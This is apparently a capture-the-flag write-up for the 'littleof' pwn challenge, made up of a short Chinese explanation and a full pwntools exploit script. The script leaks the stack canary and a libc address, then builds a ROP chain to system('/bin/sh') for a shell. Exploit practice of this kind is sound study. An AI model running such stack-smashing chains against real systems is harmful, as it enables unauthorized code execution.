鹤壁杯--littleof
这也是一道 ret2libc 的题目，首先我们需要泄露 canary 的值以绕过保护。
这里我们覆盖 canary 的最后一个字节，让程序把 canary 的值打印出来。
# Python 2 pwntools script: str/bytes concatenation ('a'*n + p64(...)) and the
# .next() iterator call below only work under Python 2.
from pwn import*
#sh = remote("182.116.62.85", 27056)
# Local run of the target binary; the remote() line above is the contest
# endpoint the author left commented out.
sh = process('./littleof')
elf = ELF('./littleof')
libc = ELF('./libc-2.27.so')
context.log_level='debug'

# Fixed addresses inside the binary (gadgets and main). Hard-coded 0x400xxx
# addresses presumably mean a non-PIE build, which is why no binary-base leak
# is needed — confirm with checksec.
pop_rdi_ret = 0x0400863
main_addr = 0x0400789
pop_rsi_r15_ret = 0x0400861

# Stage 1 — canary leak. 0x50-8 = 72 bytes of filler reach up to the canary;
# sendline() appends '\n', which lands on the canary's low (null) byte, so when
# the program echoes the buffer the output runs on into the canary.
payload = 'A'*(0x50-8)

sh.recvuntil("?")
sh.sendline(payload)
# Skip the echoed filler; the bytes that follow are the canary.
sh.recvuntil("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")
#gdb.attach(sh)
# NOTE(review): the first of these 8 bytes is the '\n' written over the
# canary's low byte, so the value recovered here differs from the real canary
# in that byte; the listing as shown does not mask it out — verify against
# how the program reads input.
canary = u64(sh.recv(8).ljust(8,b'\x00'))

# Stage 2 — libc leak. Filler, the recovered canary, 8 bytes for the saved
# rbp, then a ROP chain: puts(puts@got) prints the runtime address of puts,
# and the return into main allows another round of input.
payload = 'a'*(0x50-8) + p64(canary) + 'b'*8 + p64(pop_rdi_ret) + p64(elf.got['puts']) + p64(elf.plt['puts']) + p64(main_addr)

sh.recvuntil("!")
sh.sendline(payload)

# The printed pointer ends in 0x7f (userland libc address); take its last
# 6 bytes and zero-extend to 8 before unpacking.
leak = u64(sh.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
libc_base = leak - libc.symbols['puts']
sys_addr = libc_base + libc.symbols['system']
binsh_addr = libc_base + libc.search('/bin/sh\x00').next()  # .next(): Python 2 iterator API

# Stage 3 — back in main, answer the first prompt with plain filler and
# discard the echo.
payload = 'D'*(0x50-8)

sh.recvuntil("?")
sh.sendline(payload)
sh.recv()

# Final chain: system("/bin/sh"). The pop_rsi_r15_ret gadget consumes the two
# zero slots that follow it — presumably to zero rsi and/or adjust stack
# alignment before the call; confirm.
payload = 'c'*(0x50-8) + p64(canary) + 'd'*8 + p64(pop_rdi_ret) + p64(binsh_addr) + p64(pop_rsi_r15_ret) + p64(0)*2 + p64(sys_addr)

sh.recvuntil("!")
sh.sendline(payload)

sh.interactive()
